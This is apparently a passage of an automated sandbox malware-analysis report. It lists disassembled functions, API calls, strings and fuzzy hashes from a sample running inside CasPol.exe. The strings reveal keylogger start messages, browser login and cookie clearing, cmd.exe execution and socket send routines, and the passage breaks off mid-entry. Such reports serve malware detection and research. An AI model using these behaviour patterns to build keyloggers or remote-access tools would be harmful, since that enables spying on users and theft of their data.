_free.LIBCMT ref: 0044E1B0
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9

Function 00446F53 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00434413,00434413,?,00445369,00446B52,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?), ref: 00446F58
_free.LIBCMT ref: 00446F8D
_free.LIBCMT ref: 00446FB4
SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FC1
SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FCA

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F

Function 0044F7AD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F7C5

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

_free.LIBCMT ref: 0044F7D7
_free.LIBCMT ref: 0044F7E9
_free.LIBCMT ref: 0044F7FB
_free.LIBCMT ref: 0044F80D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C

Function 004432F7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00443315

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

_free.LIBCMT ref: 00443327
_free.LIBCMT ref: 0044333A
_free.LIBCMT ref: 0044334B
_free.LIBCMT ref: 0044335C

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E

Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,?), ref: 00416768
GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
IsWindowVisible.USER32(?), ref: 004167A1

Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8

Strings

(FG, xrefs: 0041692A

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ProcessWindow$Open$TextThreadVisible
String ID: (FG
API String ID: 3142014140-2273637114
Opcode ID: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
Opcode Fuzzy Hash: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A

Function 0044D469 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044D4B8
_free.LIBCMT ref: 0044D5D5

Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,00434413,?,?,?,00434413,00000016,?,?,0043A843,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417,?,00434413), ref: 0043A888
Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000,?,00434413), ref: 0043A88F

Strings

., xrefs: 0044D78C
*?, xrefs: 0044D4AC

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54

Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(?), ref: 00409601

Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212

Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5

Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Strings

>G, xrefs: 00409657
XCG, xrefs: 0040962C
`AG, xrefs: 00409676

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsendsocket
String ID: XCG$`AG$>G
API String ID: 2334542088-2372832151
Opcode ID: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
Opcode Fuzzy Hash: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E

Function 004426E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442724
_free.LIBCMT ref: 004427EF
_free.LIBCMT ref: 004427F9

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 0044271B, 00442722, 00442751, 00442789

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
API String ID: 2506810119-3657627342
Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59

Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A

Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F

Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5

Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643

Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC

Strings

8>G, xrefs: 00403A5B
/sort "Visit Time" /stext ", xrefs: 00403A76

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$8>G
API String ID: 368326130-2663660666
Opcode ID: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
Opcode Fuzzy Hash: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99

Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946

Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905

Strings

Offline Keylogger Started, xrefs: 004098C7, 004098CE, 004098FB

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
Opcode Fuzzy Hash: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB

Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9

Strings

Online Keylogger Started, xrefs: 0040A626, 0040A62F, 0040A659

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
Opcode Fuzzy Hash: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB

Function 0044AA83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
__dosmaperr.LIBCMT ref: 0044AB0E

Strings

`@, xrefs: 0044AA88

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: `@
API String ID: 2583163307-951712118
Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F

Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7

Strings

Connection Timeout, xrefs: 00404B66

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
Opcode Fuzzy Hash: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A

Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08

Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810

__CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C

Strings

bad locale name, xrefs: 0040CE16

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
Opcode Fuzzy Hash: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C

Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4

Strings

open, xrefs: 004151EE
cmd.exe, xrefs: 004151E9
/C , xrefs: 004151D2

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
Opcode Fuzzy Hash: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E

Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3

Strings

pth_unenc, xrefs: 0040AFBA

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: TerminateThread$HookUnhookWindows
String ID: pth_unenc
API String ID: 3123878439-4028850238
Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759

Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
GetProcAddress.KERNEL32(00000000), ref: 004014E6

Strings

GetLastInputInfo, xrefs: 004014D5
User32.dll, xrefs: 004014DA

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F

Function 00448D1B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00448DA6
__alldvrm.LIBCMT ref: 00448FA7
__alldvrm.LIBCMT ref: 00448FC9

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759

Function 004559DA Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00455B09

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3664c7d1b7189549baf4d493e5c665213dd82d933dd96c7687bae007d5c3c42b
Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
Opcode Fuzzy Hash: 3664c7d1b7189549baf4d493e5c665213dd82d933dd96c7687bae007d5c3c42b
Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A

Function 00441A91 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784

Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
Opcode Fuzzy Hash: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A

Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040B81B
Sleep.KERNEL32(00001388), ref: 0040B8A3

Strings

[Cleared browsers logins and cookies.], xrefs: 0040B8DE
Cleared browsers logins and cookies., xrefs: 0040B8EF

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
Opcode Fuzzy Hash: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF

Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D

Sleep.KERNEL32(00000BB8), ref: 004115C3

Strings

@CG, xrefs: 00411547
BG, xrefs: 00411539
exepath, xrefs: 0041154C, 0041158C, 0041160D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID: @CG$exepath$BG
API String ID: 4119054056-3221201242
Opcode ID: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
Opcode Fuzzy Hash: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD

Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739

Sleep.KERNEL32(000001F4), ref: 00409C95
Sleep.KERNEL32(00000064), ref: 00409D1F

Strings

[ , xrefs: 00409CB1
], xrefs: 00409C9D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

